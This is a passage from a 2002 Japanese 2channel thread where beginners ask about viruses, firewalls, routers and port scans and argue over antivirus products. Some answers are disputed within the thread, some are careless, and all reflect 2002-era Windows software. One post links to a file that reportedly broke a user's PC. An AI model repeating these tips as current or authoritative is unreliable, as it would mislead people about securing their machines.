(P/fwのログで確認しました)を設定したにも関わらず 、勝手にアクセスしてしまいやがります。
ということは、すでに、OSおよびエクスプローラが書き換わってるという ことでしょうか?
ウィルスはOS・マカフィーを起動時事にONにしています。また、マザーボード
(AOPEN:AK77−333)には、BIOSレベルでウィルスチェックの機能が搭載
されており、何度か実験してみたところ、検出したらピー音がなっています。
知り合いに相談したところ:
結論としてOSの再インストールしかないそうです・・・。
使用環境: 自作PC、OS98、エクスプローラver6(最新のUpDate済み)、
ブロードバンドルータ使っていないので、NAT/IPマスカレードしてません。
Winnyよく使いますので、HDDを今度100GB買います。
ついでに、海外のエロサイトにもよく行きます。(それが原因だと指摘され
ています)
使用回線: Yahoo!BB
※「winipcfg」で、開放と書き換えをしょっちゅう行いますが、グロIPが
書き換わった試しがありません。でも、金の割には早いので満足。
2chしか早いレス期待できるとこないわけで・・・。
長文失礼しました。なにとぞ、よろしくご回答お願いいたします。
267名無しさん@お腹いっぱい。:02/12/08 23:03
>>263-264
Q324929 : 2002 年 12 月 Internet Explorer 用の累積的な修正プログラム
これをなんどDLしても、DLできてない。
『成功』なんて出てきても、IEのバージョンをみるとDLできてないのがわかる。
何が悪いんだ?
>>266
( ´,_ゝ`) プッ
>>266
長すぎる長文とかここでは誰も読まないから
http://pc.2ch.net/test/read.cgi/sec/1039320021/l50
ここにでも行ってやってください
このスレの>>1はマルチポストでも怒らないらしいから
270erenor:02/12/08 23:23
TROJ_JAPSX.A
というウイルスが私のパソコンにいます。
ウイルスバスターで検出されますが、隔離
できないようです。
毎回、検出されるのですがどうすればよろしいでしょうか?
初心なのでわかりません。
271名無しさん@お腹いっぱい。:02/12/08 23:25
IPぬいたといわれたんですが
ほんとう?
>>271
http://pc.2ch.net/test/read.cgi/sec/1039320021/l50
ここにでも行ってやってください
このスレの>>1はマルチポストでも怒らないらしいから
>>270
ハードディスク初期化
意味わからないなら このスレで聞け
http://pc.2ch.net/test/read.cgi/sec/1039320021/l50

>>271

255.255.255.255見たいな数字を相手から聞いて
自分のIPと同じかどうか確認してみたら
意味わからなければ あなたも上のリンクのスレで質問して
>>270
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_JAPSX.A
ttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=5025

駄目な例
 ・名前、本文に「初心者」が入っている。
 ・2度目以降の書き込みに通し番号が入っていない。(主に捨てハン)
 ○環境・状況が書かれていない、または小出し。
 ・質問が1行。
 ◎日本語がおかしい。
 ・検索という言葉を知らない。

自分の文章をもう一度読み直して見ましょう。
第三者が読むと意味不明です。
276名無しさん@お腹いっぱい。:02/12/09 08:49
age
277bloom:02/12/09 09:10
278( ・_・)y─~~~:02/12/09 14:23
自分の REMOTE_ADDR & REMOTE_HOST 確認用

http://www8.big.or.jp/~000/CyberSyndrome/evc.html

相手のIP確認用

http://www.apnic.org/search/index.html

のSite Searchでgo
279名無しさん@お腹いっぱい。:02/12/09 14:32
ブラクラチェッカーのページ落ちた?
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi
>>279 いや、生きてるよ。
>>270
そいつは感染活動しないようだから、ハードディスクをフォーマットする
必要はないと思う。273さんより275さんのアドバイスのHPを見た
方が良いと思います。
>>266
マカフィーはウィルス検出力が弱いのでvectorで無料版アンチドートという
強力なウィルス検出ソフトをいダウンロードしてチェックしてみてください。
一番上のボタンを押して「コード解析」だけでなく、「圧縮ファイル」と
「メール検索」にも必ずチェック入れてスキャンしてください。
それから、3番目のボタンでレジストリチェックをしてください。
http://www.vector.co.jp/soft/win95/util/se108623.html
それから、悪質なエロサイトに行かれる場合にはActive X、java、
java scriptをオフにされる事を薦めます。
件名なしで本文がtestのみのホットメールが届きました。
添付はありませんでした。
これはウィルスメールですか?
>>283
     知  ら  ん  が  な

ウィルスチェックしろ。
>>284
添付ファイルがなければセキュリティーパッチをIEにあててればだいじょうぶ
だと思います。
しかし、知らない相手からtestなどという失礼なタイトルで送られて来た
メールは読まない方が良いでしょう。

>>284
webmailの本文はユーザーがウィルスチェックはできないと思いますけど。
ただし、hotmailは(ウィルス検出力が弱くてあてにできない)マカフィーが
一応はチェックしてたと記憶してます。
>>283
ゴミだ
ホカセ
>>282
初心者に駆除能力のないAntidoteを勧めるのはいい加減止めろ。
マカフィーの検出力が低い?デマも程々にな。
288266:02/12/09 22:03
>>282
レスありがとうございます。「アンチトード」取り敢えず試してみます。

それとこの板の”掟”を知らずに、長々と質問を書き込んだことを、
お詫びします。ちょいと出直してきます。
ありがとうございました。
>>266
ご愁傷様
290名無しさん@お腹いっぱい。:02/12/09 22:29
>287
必死だな。(プ
291名無しさん@お腹いっぱい。:02/12/10 08:24
age
>>287
林檎の木というサイトの検出率調査結果でもアンチドート無料版(98.77%)より
マカフィー(89.16%)は劣ってます。これ、100%から引き算すれば未検出率は
9倍ほど違います。
さらに、マカフィーはマイナーなウィルス単体の検出ができないという問題
だけでなく、有名なBadtrans Bウィルス添付メールの検出ができなくて驚いた
私の経験から実際使用における難点があると思ってます。
(マカフィーもBadtrans B単体なら検出できるはずですが形を変えて存在すると
検知できないのだと思います。)
尚、林檎の木というサイトの検出率調査結果ではノートンが1位でアンチドート
無料版が2位ですが、無料版アンチドートはOEのメールフォルダの上から
ウィルスメールを検知できるほど強力ですが、ノートンはできないそうです。
だから、私の知る限り無料版アンチドートがウィルス検出力最強です。
293名無しさん@お腹いっぱい。:02/12/10 08:55
NAV2002ですが、更新期限が切れました。それはいいのですが、警告ダイアログが
でます。 起動時の確認チェックはオプションでしないにできても、一日に一回、不特定の
時間に勝手に出る警告ダイアログを出さない方法はないのでしょうか。
更新する気はありません。 リスクは承知で使用しているのだから、ウザイだけなんです。
林檎の木・ウィルス検出率調査結果
http://ringonoki.net/sub/anti.html
295あぼーん:あぼーん
あぼーん
>>293 LiveUpdateを止めると可能かもしれないが、更新しないのなら
アンインストールをお勧めします。
他の無料アンチウィルスを使うとか、ノートン体験版をとりあえず入れるとか
なんらかのウィルス対策をした方がいいと思う。

あとは例の方法で更新期限を延ばすとか(w 
ノートンインターネットセキュリティスレの過去ログ参照。
297名無しさん@お腹いっぱい。:02/12/10 09:28
もしかしてヤブパーに粘着してコピペ貼ってるヤシは厨房のフリしたクソソフト会社社員?
チョトワラタ
299名無しさん@お腹いっぱい。:02/12/10 10:44
>>292
そのサイトは知ってるよ。どのような環境、設定でどんなウィルスを使ったか?が
明示されていないデータは参考程度にはなっても絶対ではない。
「適当に拾ってきたウィルス」とか「圧縮ファイル1つに2つ以上のウィルスが入っている場合あり」
などのあいまいな条件のデータを君は根拠にしているんだな、なるほど。

そういうレベルで評価するなら結果が違うケースなどいくらでもある。例えば
http://pc3.2ch.net/test/read.cgi/software/993630697/159-172n
とか
http://www.k-raito.com/sec/end.html
http://www.k-raito.com/sec/i01.html
など。複数のウィルスをまとめて圧縮した場合は見かけ上の検出数が減るという
考察を読めば、評価の際に圧縮の状態の切り分けが大事だとわかるはずだが。

他にも海外のサイトなどアンチウィルスのソフトを評価しているところはあちこちある。
この板の色んなスレにリンク貼ってあるから探してみれ。

添付メールの検出云々の話は他のとこで指摘されてたろ、常駐監視状態で検出
できればよいはずだと。

別にマカフィーを勧めてるわけじゃない、むしろ勧めない。ただ問題はは検出力より
別の所にある。回答者を気取りたいならもっと知識を付けてからからにしてくれって事。
300300:02/12/10 10:45
ワーオ
>>299 マジレスは情報としてありがたいが、「彼」はここで間違いを指摘されて
知識が付くうちは出て行かないし、間違ったレスを続けると思うので、
基本的に放置でおながいします。
302名無しさん@お腹いっぱい。:02/12/10 13:27
ヴァカピー必死だな。ワラ
>口調は丁寧かつ親切、それで
>いて妙な自信が感じられるので質問した初心者が騙されてしまいます。

前に、そっくりなヤシ居たな。。ココできる前。
あをりに、「白痴」がキーワードだた。。
304名無しさん@お腹いっぱい。:02/12/10 14:13
NortonInternetSecurity2002を削除して、NAVだけにしたいんですが
いったんアンインストールしたらNPFはレジストリからも消えるんでしょうか?
305>303:02/12/10 14:23
自作自演すな、ヴォケ。
306名無しさん@お腹いっぱい。:02/12/10 14:26
マカフィーを試してみたいのですが無料御試し版はどこにありまつか?
>>299
オイ、マカの試用版はあるのか?(Wara
マカフィはどうか知らんが他のアンチウィルスソフトは
みんな無料版とか試用版とかあった罠。
309299:02/12/10 15:09
あーあ、どうもアンチマカフィー馬鹿に火を付けちゃったみたいだな。
俺は「勧めない」と書いたんだが日本語が読めないか?
ならこれでどう?「マカフィーは良くないから使うな」
藪と言う奴の書き込みの認識不足を指摘しただけ。

>>306
無料お試し版は有る事は有る。
http://www.mcafeeb2b.com/naicommon/buy-try/try/products-evals.asp
でも製品版はトラブルが多発しているから買わんほうがいい。
この板のマカフィースレ見れば状況はつかめるはず。

>>301
以後気をつけます。
310303:02/12/10 15:12
>>299
検出力といっても、パターンファイルに負うところが大きい訳で。
エンジンで検出力上げると未知?のウイルスに対して検出する可能性は出るけど
敏感になりすぎて誤検出も多くなる訳で。綿密なヒュリスティク掛ければ動作も
重くなる訳で。
パターンファイルは、見つけた新しいウイルスのバイナリを解析して結局人間?
がシコシコパターン登録してる訳で。
んだから、どれだけWEBから新しいウイルス見つけて来れるかというのも重要で
有る訳で。
ドートはAVP絡みで、この辺は海外ユーザーも多い訳で。ウイルス作者も愛用し
てたりする訳で、新作送りつけて登録して貰って喜んでたりする訳で。
シマンテクはBugtraqも手に入れてる訳で。独自のウイルスサーチボット走らせ
て、主要な配布サイト巡廻してるってどっかで読んだ事も有るな。。。
>>305
んぢゃ、何処が自演だか当ててみ?
>>309
日本語版はないの?
309=310=dialup-user?
313299:02/12/10 15:27
>>311
日本語版もあるんだが近づかん方が良い。代理店が悪名高いあのソースネクスト。
申し訳ないがリンク貼りたくない。
もし見つけても「セキュリティセンター」だけは入れないように。
システム重くするだけで自社製品の宣伝以外何の役にもたたず削除困難のやっかいもの。
>>312 (´-`).。oO(そんなこと分かるわけないだろ)
315306:02/12/10 15:33
>>313
どもです。
316303=310:02/12/10 16:18
>>312
>309=310=dialup-user?
ブゥウウウ=====
>>314
>そんなこと分かるわけないだろ
正解でつ!ピンポンピンポン!!
FWにZoneを入れているんですが、XPのFWも設定しておいた方がいいですか?
318名無しさん@お腹いっぱい。:02/12/10 22:08
ヤフーのADSL(ブリッジタイプのルーター)を入れました  ファイヤーウオールとしてノートンISを入れてあれば
ブロードバンドルーターを購入する必要はありませんか?
319nanasi:02/12/10 22:45
JavaとActiveXの解除の方法教えていただけませんか?
>>318
ヤフー12Mのトリオモデムにはルーター機能がありますので、さらに
ルーターを購入する必要はないでしょう。(1.5Mと8Mはモデムだけだそうですが)
それより、念のため共有の設定をはずしておいた方が良いと思います。
http://tools.bb.yahoo.co.jp/setup/adsl/security/95.html
>>319
IEで、ツール→インターネットオプション→セキュリティー→レベルの
カスタマイズで設定してください。
322名無しさん@お腹いっぱい。:02/12/10 22:52
323nanasi:02/12/10 22:53
>>321
ありがとうございます。
324nanasi:02/12/10 22:55
JavaとActiveXの単語が入ってるのは全部無効にしたほうが良いですか?
325 :02/12/10 22:59
>>324
ご自由に
326名無しさん@お腹いっぱい。:02/12/10 23:06
>>320
ありがとうございます
327名無しさん@お腹いっぱい。:02/12/10 23:07
ブラクラを踏んでしまって、オンラインでチェックかけたら、
どうやらVBS_MERASHAというウイルスに感染してしまってるようなんですが、
どうやったら駆除できるんでしょうか?
〜.ap.plala.or.jp<8080><3128><8000><1080>

さっき削除依頼をしたらこのように出たのですが、どうすればよいのでしょうか。
ADSL+ルータ+ノートン先生なんですが
>>328 固定IPアドレスでないなら、ルータの電源を落としてしばらくしてから再起動する。
>>327
ブラクラのアドレス貼ってみ。
直リンは絶対するなよ
331ぷらら:02/12/10 23:25
>>329
これで何がわかるのでしょうか?
さっきからググッてるんですが、どうも…。
>>331
リモートホストの次の括弧の数字は、ポートスキャンしたポート。
串を使ってないか2ch側がチェックしただけだから、安心しろ。
333ぷらら:02/12/10 23:51
>>332
安心しました。このポートが開いててガクガクブルブルって訳じゃないんですね…。
あるスレッドで私が発言してことで、相手をものすごく怒らせてしまったようで、
ハッキングされているのではないかと脅えています。
IP晒されてはいないのですが、次のような妙なプログラム言語のようなものがそのスレに書き込まれているのです。

AaA@R(s「  ←英数字の部分は変えてあります

のようなものが書かれてあるだけなのですが、これの正体が分からず、
不気味なのです。

これは「お前のパソコンの中身を覗いているぞ」という脅しなのでしょうか?
誰か教えてください。
335 :02/12/11 03:03
>>334
気にするな
336334:02/12/11 03:20
>>335
もう少し教えていただけませんか?
せめてあの妙な記号の意味だけでも知りたいのです。
不気味でたまりません。

それとも、全く問題ないものだから、無視していいということですか?
>>336
未来のキミからのMessageさ!!
だから、そのうちわかるよ。
338334:02/12/11 03:39
>>337
余計に不安になってきました。
粘着ですいませんが、もう少しヒントだけでもお願いします。

放っておいて実害がないのなら、安心するんですが…
私は訳のわからないものが怖いのです。
自分で調べようと思ったのですが、何から調べていいか分かりません。
あの記号を入れてぐぐってみても変な画像とかが見つかるだけだし…
>>334
あんまり気にし過ぎると禿げるよ
340334:02/12/11 03:58
>>339
髪の毛は多い方ですから、まだ多少は大丈夫です。
親が禿げてるから本当は危ないんですが。
341名無しさん@お腹いっぱい。:02/12/11 09:47
この板にまともに質問に答えられる人はいません
こちらで聞きましょう

初級ネット板http://pc.2ch.net/hack/
342334:02/12/11 10:46
>>341
そうですか…。そちらで聞いてみます。
どうも。
コピペにマジレスカコワルイ
>>320
Yahoo!BB 12Mでトリオモデムを使っているのですが、どうすればルータとして使えますか?
説明書にはルータとしての使用法が書かれていません。
345sage:02/12/11 14:08
 HTML.Redlof.Aというウイルスに感染してしまいました。
 シマンテックのサイトで駆除方法を調べて、レジストリもいじって、ちゃんと削除
出来たと思ったのですが、なぜかマイコンピュータの中のファイルやフォルダが
表示されなくなりました。
 フォルダの下の「オブジェクト数」が表示されるところには、ちゃんと「○個のオブジェクト」
と表示されます。また検索でファイルやフォルダを検索した時も、ちゃんと表示されます。
 ですが、フォルダを開くと中身が表示されず、空っぽの状態です。
 フォルダの設定が弄られてしまったのかと思い、「フォルダオプション」の「標準に戻す」や
「全標準をリセット」をクリックしても状態は変わりません。もちろん再起動もしました。
 OS再インストールはなるべく回避したいですが、今のままだとそれしか思いつきません。
 直す方法をご存知の方、いらっしゃったら教えて下さい。
345です。
すみません。sageそこねました。
何でメル欄じゃなくて名前がsageなんだ。アホすぎだ、自分。
PCじゃなくて自分の頭が感染しているみたいです。

 追加ですが、HTML.Redlof.Aについて調べても上記のような症状が出たという
情報が見当たらないので、もしかしたらウイルスが直接の原因ではないのかも
しれないです。
「ヤフーはネット直結でヤバイからルーターを買い足せ」と言われました・・・
パソコンに火壁ソフトは入れてあるのですが それでもやはり買い足さないとヤバイのですか?
ゾネのログに
FWOUT,2002/12/11,1*:37:54 +9:00 GMT,***.**.**.*:1029,**.**.***.**:80,TCP (flags:S)
っつーのが2回ほど残ってたんですけど、これってトロイですかね?
349名無しさん@お腹いっぱい。:02/12/11 15:13
>>347
本当にネットに直結だったらどんなによかったことか。

ただルータは安心代として有効。アホーに限ったことじゃない。
>>348
あなたのパソコンからwebサイトにアクセスした記録(外部へ送信)。
それだけでは正常の通信。
>>331-343

初級ネット板に行って>>334さんは見事に疑問解決されたみたいですね。
http://pc.2ch.net/test/read.cgi/hack/1038999540/558-568
引用レス番号を間違えました。>>341-343でした。

>>341
>この板にまともに質問に答えられる人はいません
>こちらで聞きましょう
>
>初級ネット板http://pc.2ch.net/hack/


たしかに、ここは答えずに威張ってばかりの人がいますね。
私も苦労しました。











てすと。
>>344
私はeAccess12M利用していてYahooBBのユーザーではないのですが、
Yahooのパンフレットとかyahooや孫社長の記者会見のニュースでトリオモデム
にはルーター機能があると判断したのです。
http://bb.watch.impress.co.jp/news/2002/10/01/triomd.htm
しかし、あなたの話が気になって調べると無線LANのオプションを申し込まない
場合にはYahooBB12Mのトリオモデムの設定がブリッジモードに設定される
という報道も見つけました。
http://www.zdnet.co.jp/broadband/0210/01/xjrb_ybb3.html
これが恒久的変更不能な設定なのか単なる初期設定で変更可能なのか
質問しようとYahooBBの [email protected] にメールしようとしたのですが
送信不能でした。
写真で見る限りオプションでレンタルされる無線LANカードは無線(および
無線用暗号)のみの機能しかないと思われますのでルーター機能はトリオ
モデム本体にあるはずなのでYahooに設定方法を聞いてください。
その場合にはパンフレットとか孫社長の記者会見とか他所が月500円でルーター
機能が使えるのに(Yahooは890円)とか、YahooBBではルーター機能がないと
不安だとかルーター機能のあるトリオモデムをレンタルしながらルーター機能
を使わせないのは法的に違法だとか粘り強く主張してください。
>>347
YahooとCATVは同じ地域のユーザー同士がLANのように接続されてて
共有ファイルが覗き見られる危険があるとの事ですので共有設定を
はずされる事を勧めます。
http://tools.bb.yahoo.co.jp/setup/adsl/security/95.html

尚、あなたがYahooBB12Mユーザーで有線のみの利用ならトリオモデムに
入ってるはずのルーター機能を使うのにどうすれば良いか>>355を見て
YahooBBに聞いてください。特約条項のない限り、法的にはルーター機能を使う
権利があると思います。
357348:02/12/11 20:25
>>350
ありがとうございます。ホッとしますた。
358名無しさん@お腹いっぱい。:02/12/11 20:29
このスレは死にました。
いや殺されました、藪に。
>>327
もう誰かが答えたかそれとも過去ログにあるかもしれませんが、IEで
ツール→インターネットオプションでインターネット一時ファイルの
削除をして再度ウィルススキャンしてみてください。
>>324

>JavaとActiveXの単語が入ってるのは全部無効にしたほうが良いですか?

いつも全部無効にするとマイクロソフトのサイトでアップデートすらできなく
なります。私は通常はセキュリティー設定の「中」で「有効」となってる事項を
ダイアログ表示に変更してます。
わからなければ、安全なサイトはセキュリティー設定を「中」、危険なサイトは
セキュリティー設定を「高」にしてください。
それから、国際電話・ダイヤルQ2防止ソフトを常駐させてください。
http://www.emurasoft.com/jp/chintcal/index.php
詳しい事はnetn@viという雑誌に時々載ってます。
ほっとぞぬとかつかってんなら、NGワードへの登録をおすすめするよ。
いや、マジで。
362cheshire-cat ◆PhCATJR.v6 :02/12/11 21:07
>>345-346
漏れ、そゆ症状はまだどこでも見覚え無いし、情報持って無いんですが。

これと類似の要因による問題っすか、ひょっとして?
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=5155
このFolder.httファイルって、フォルダオプションでWEB表示しる時に利用するんで。
同じようなものかなぁ、って思ったんでレス。

つか、今後の報告希望。
とりあえずテンプレ保存して新スレ立てないって事でどうよ?
くだ質も
364名無しさん@お腹いっぱい。:02/12/11 21:17
質問します。
OEに怪しいメールが届くと、すぐにゴミ箱入れるんですが
そのメールのプロバティを開いて見ることは危険ですか?
一応、プレビューウィンドウを表示しない設定にしています。
>>358

言っときますが、初級ネット板に誘導された>>341さんは私とは別人です。
>>364
プレビューしなければ大丈夫です。
質問です。
Webメールで相手に返信すると、こちらの身元は
どこまで相手に判りますか?

私のwebメール宛に届いたメールに返信しようと思ったのですが
相手に私のIP?とか、どの地域に私が住んでいるのか(おおまかでも)
知られたくないのです・・・
>>367
自分で自分宛てにウェブメールを送る
そのヘッダを見る

さ、自分でやってみようか?
369345:02/12/11 21:33
>> 362
 ありがとうございました。リンク先のページ通りに、フォルダオプション>全般>Web表示
のところを「従来のWindowsフォルダを使う」にしたら、無事ファイルが見えるようになりました。
 OS再インストールしなくて済みました。
 一回「従来のWindowsフォルダを使う」を選択して適用してからだと、もう一度「フォルダでWeb
コンテンツを使う」を選択しても、さっきのようにファイルが見えなくなるような症状は起こらなく
なりました。一度見えるようになると元に戻るみたいです。
 しかし何もこんな珍しい症状を起こしてくれなくても良いのに。こんな希少性、嫌だ(ノдT)

 本気で助かりました。
 ◆PhCATJR.v6さんに幸せ訪れろ〜! 山ほど訪れろ〜!!

 ありがとうございました。
370cheshire-cat ◆PhCATJR.v6 :02/12/11 21:35
>>367
Air'Hとか、全国規模のプロバのADSLなら(例外はあるらしけど)、割り当てられるIPアドレスは全国単位なんで、地域特定は無理だと思う。
371cheshire-cat ◆PhCATJR.v6 :02/12/11 21:39
>>369
えがったですね。
んでも、漏れが想定していた状態と違っていたようなんですが。。。。。

とりあえず、おめ。
>>368
そこまでは自力で出来ました。
色々と出てきましたが、私には理解不能です。
ですが、相手はPC関係に詳しいので質問しました。
匿名と言うわけには行かないみたいですね。

>>370
家はケーブルTVなのでバレバレですね。。。

ありがとうございました。
>>372
ほいよ
http://www.nifty.com/mail/header.htm
とりあえず分からんときはぐぐって20ページぐらい見てみれ
ttp://www.google.com/search?num=50&hl=ja&q=メールヘッダ
>>373
どうもです。勉強して来ます。
>>372
私のwebメールは私のIPは表示しませんけど。
376cheshire-cat ◆PhCATJR.v6 :02/12/11 22:08
>>375
フリーでWebメールを提供してる所は、たくさんあって。
中にはヘッダを簡易表示して、詳細を表示しない所もあるし。
最初から受信したメールのヘッダ情報をfromやmessege-idなどしか表示しない所もある。

ちなみに。IPと表記するのは、ヤメレ。
377にゃ:02/12/11 22:17
>>375
なんでもいいから、適当なコト言うのはやめてくれ。
それも、さもしてやったりのように。
>>377
一筋縄でいかないお方なんで放置でおながいします。
(ハックラ板でもこーゆーのはいないかも、というほどのお方です)
ttp://jp.y42.briefcase.yahoo.co.jp/bc/ugsecret/lst?.dir=/&.view=
今友達のパソコンを借りて書いてるんですが↑のプログラムを自分のパソコンで開いてしまって
パソコンが立ち上がらなくなりました。
実行する前にウイルスチェックもしたんですけど、ウイルスではないようです。
何か心当たりある人居ませんか?
380 :02/12/11 22:53
>>379
いない
381cheshire-cat ◆PhCATJR.v6 :02/12/11 22:57
382にゃ:02/12/11 23:07
>>378
どーしても書きたくなりました。
今回だけのご無礼お許しを。
383379:02/12/11 23:08
>>381
レスサンクス!どうやらゲームオーバーのようですね(泣)
384cheshire-cat ◆PhCATJR.v6 :02/12/11 23:09
>にゃたん
まぁ、お気楽に(らぶ
385名無しさん@お腹いっぱい。:02/12/11 23:19
>>377
ヴァカかオマエ
386cheshire-cat ◆PhCATJR.v6 :02/12/11 23:19
>>383
FinalDataエンタープライズとかじゃなくても。
jpgとかなら、FINALDATA フォトリカバリーで救出できたって報告が1例だけありますたが。
エンタープライズ板でも全部ダメっていうお方もいたけど。

一応、これお勧めしまする(安価で高性能だし)。
他のHDにOSとアンチウイルスソフトとこれをインストール。
そして新HDをマスター、旧HDをスレーブ接続して起動。
旧HDのデーターをサルベージすると、全てとは言えないけど、昔削除したファイルとかWordのテンポラリファイルとかは拾えるかもしれませぬ。
FINALDATA2.0 DX Premium
http://www.finaldata.ne.jp/

>>385
分かりやすいレスだな。正体が
388名無しさん@お腹いっぱい。:02/12/11 23:25
ポートスキャンというのをされるとどういう害が出るのですか?
友人から「セキュリティソフト入れてないとポートスキャンとかされてヤバイぞ」って言われたので
ちょっと気になるので教えてください
377はほっとめーるしか知らないと思われ。
>>388
ポートスキャン自体には害はない。アタックの下準備の様なもの。
ファイアーウォールを入れておけば、スキャンされてもPCの存在を隠すことが可能。
どちらかとゆーとポートスキャン「とか」の「とか」のほうがヤバいというか要対策。
>>388
アンチウィルスソフトは多少無理してでも絶対に導入する。
パーソナルファイアーウォールソフトも、
ファイアウォール機能のあるルーターとか使ってるのでなければ入れとけ。

ともに導入・設定に関しては多少の(金額にまあまあ反比例した)勉強が必要。
393名無しさん@お腹いっぱい。:02/12/12 00:20
質問です
ブロードバンドルータを買いました。

パケットフィルタリングという機能がついているのですが、
マニュアルを読んでも設定の仕方がまるで分かりません。
易しく説明してあるサイトがあれば教えて下さい。

ちなみに、アイオーデータの「WN-B11/BBRH-S2」です。
394はい:02/12/12 00:25
パケットフィルタってのはどのルータでもついている。
あんまし、やくにたたんので気にしなさんな。
宣伝ほどの効果はどのメーカもなし。
コレガなんかステルスもついてるぞ、意味ねーけどよ
395名無しさん@お腹いっぱい。:02/12/12 01:34
すいません、ちょっと質問させてください
先程いきなり「〜meesage」と銘打ったウインドウが開きました
普通に2ch見てたら最前面にいきなりです
中身は文字化けしていて解読できず

で、不安になったのでオンラインスキャンしましたところ
Agobot.wormというのがひとつ検出されました

http://www.ahnlab.co.jp/virusinfo/view.asp?seq=245&pageNo=1
だもんで↑を読んで
まずsysmgr.exeを削除、続いてレジストリは見てみましたが
Config Loaderなる項目は追加されてはいませんでした

次にpsexec.exeというのを検索しましたら一つ発見!そっこう削除しましたが・・・

さて、これってヤバい状況なんでしょうか。あのメッセージウインドウが
気になって仕方ないんですが・・・
396名無しさん@お腹いっぱい。:02/12/12 02:02
最近おれのパソの調子が悪い 電源がなかなか立ちあがりません
最近メッセで知らない奴が話したいつーことで、少し躊躇したがメンバーに入れてしまった
なんかそれ以来調子おかしいのですが
また今日MSNのホーム開いたら、おれが登録している地域と星座じゃなくて 別の地域(大阪)星座(水瓶座)になってた
実は大阪には最近、彼女がらみの知らない男が確かにいるんです
おれのパソに入りこんでいるという可能性はありますか?
どうか教えてください
397名無しさん@お腹いっぱい。:02/12/12 02:02
最近おれのパソの調子が悪い 電源がなかなか立ちあがりません
最近メッセで知らない奴が話したいつーことで、少し躊躇したがメンバーに入れてしまった
なんかそれ以来調子おかしいのですが
また今日MSNのホーム開いたら、おれが登録している地域と星座じゃなくて 別の地域(大阪)星座(水瓶座)になってた
実は大阪には最近、彼女がらみの知らない男が確かにいるんです
おれのパソに入りこんでいるという可能性はありますか?
どうか教えてください
398名無しさん@お腹いっぱい。:02/12/12 02:03
ファイヤーウォールソフトを導入した場合、WindowsXPのファイヤーウォール機能ははずすんですか?
399名無しさん@お腹いっぱい。:02/12/12 02:08
攻撃していて相手にこちらのIPが ばれたらファイアーウォールが
あっても覗かれますか?
400 :02/12/12 02:10
>>397
ある

>>398
そう

>>399
さあ そもそも攻撃するって(略
401お願いします:02/12/12 03:10
すいません 本気でコマっています 教えて下さい
私いつもログインしないでログインした画面にそのまま行って
ヤフオクを見てるのですが、今日見たらいきなりヤフオクのIDが、
「ura2ch2000」となっていたのです!!
凄くビックリして侵入されたのかな、って思ってテンパっています
ログアウトしてもう一度いつものパスとIDでログインしたら元に戻った
のですが、何か被害はあるでしょうか?
私はどうすればいいでしょうか?
裏2chのことでしょうか?すごく恐いです 助けてください
お願いします
402教えて君です:02/12/12 04:32
先日このスレを読んで、ZAを使っているのですが
PCを起動する度にロックしたはずの鍵のマークが開いています
侵入されてるのでしょうか?対処法を教えて下さい。
403402:02/12/12 04:36
Spybotも使っていますが問題はありません。
>>402
ZoneAlarm Part10
http://pc.2ch.net/test/read.cgi/sec/1039265327/

そもそも常時ロックで使用するもんじゃない。
>>401
可能性の高いものから書きます。

(1)IDとパスワードを記憶していたクッキーの有効期限が切れた
通常は1ヶ月で切れるようです。
(2)イタズラ好きの友人・兄弟にパソコンをいじられた。
(3)誤作動
(4)あなたのパソコンへの侵入
(5)ヤフーのサーバーへの侵入

おそらく、(1)のクッキー期限切れだと思います。
ただ、クッキーの有効期限が来たとしてもあなたの他人のIDを
表示するのはヤフーのバグでしょう。ヤフーは利用者が非常に多いので
セッションID使い回しにしてるんでしょうかね?
>>402
まあ、ZA側によれば404さんの言うように常時ロック使用は想定
してないそうで、少なくとも私の使ってる古いバージョン2.6は常時
使用できません。
そこで、Automatic lock をEnnableにして、Engage internet lock
after 1 minites of inactivety にしてます。こう設定すると実際上は
常時ロックとほぼ同じにできます。
408名無しさん@お腹いっぱい。:02/12/12 09:33
UDP:137がNetBIOS関係というのはわかるのですが
TCP:40195って何でしょうか?
3箇所くらいからしきりにアクセスがあって不気味なんです
409名無しさん@お腹いっぱい。:02/12/12 09:43
>>409
ありがとうございます
これで安心できます
412402:02/12/12 14:50
>>404
>>407
ありがとう 無知なもので安心できます。
NIS2003を使っているのですが起動すると、毎回

権限のないプログラムによって一部のシマンテック製品の設定が変わりました。
これは攻撃者またはウイルスが保護を無効にしようとしたことを示す可能性があります。
問題を避けるために、設定が復帰されて以前の設定に戻り、システムが再起動します。
続行するには{OK}をクリックします。

という警告が出てしまいます。再起動してもまた同じ警告が出てしまうんですが
どうすれば良いのでしょうか?
414名無しさん@お腹いっぱい。:02/12/12 16:18
>>414
解決しました、有難うございました
416名無しさん@お腹いっぱい。:02/12/12 19:09
ノートン2002をいれているのですが、コンピューターを起動したとき赤いXマークがでて
しばらく作動しません
前は最初から動いていた気がするのですが。。。
これはウイルスのしわざでしょうか?
それとも勘違いでしょうか?
417windy ◆xRcGF1SRQQ :02/12/12 19:15
>416
私も同じ状態なので気にしなくてもよいかと思われ
>>417何の説得力も信頼性もない言葉だな

まぁこういうときは・・・

みんなー呼んでねー!

「「「でてこい藪先生ーーーー!!!」」」
薮のパソは脳豚入れれない旧型と思われ。
420windy ◆xRcGF1SRQQ :02/12/12 19:51
スマソ
421416:02/12/12 20:00
>>420
同じ人がいるということで安心しました
ありがと
422周知徹底:02/12/12 21:44
>419 :薮パソユーザー ◆0fQkHdNop2 :02/12/12 21:37
>だいたい危険情報を聞いて怒ったり危険情報を隠したりするのは旧日本軍
>幹部と同じ思考回路なんじゃないですかね?
>本当なら私に感謝しても良いくらいだと思いますけど。

http://pc.2ch.net/test/read.cgi/sec/1037948222/419
423名無しさん@お腹いっぱい。:02/12/12 22:22
まえヤフーのアカウントが2chの人達に、ハックされたことあったけど、
今もヤフーのセキュリティはヤヴァイですか?
技術的にはハクろうと思えばハクれるって感じですか?
( ´ー`)oO(ハクろう?ハクれる?・・・。何語なんだろう?・・・最近変な人が増えたなぁ)
ら抜き言葉。
>>423
本当にヤフーの人からハックされたのですか?

ヤフーは以前は相当セキュリティーの問題があったようですが現在は共有の
設定さえオフにすればそれほど問題ないでしょう。
http://tools.bb.yahoo.co.jp/setup/adsl/security/95.html
ただし、Acrive Xやjavaやjava scriptをオンのまま危険なサイトに行くと
勝手に共有設定に変更されて覗かれる危険があるかもしれません。
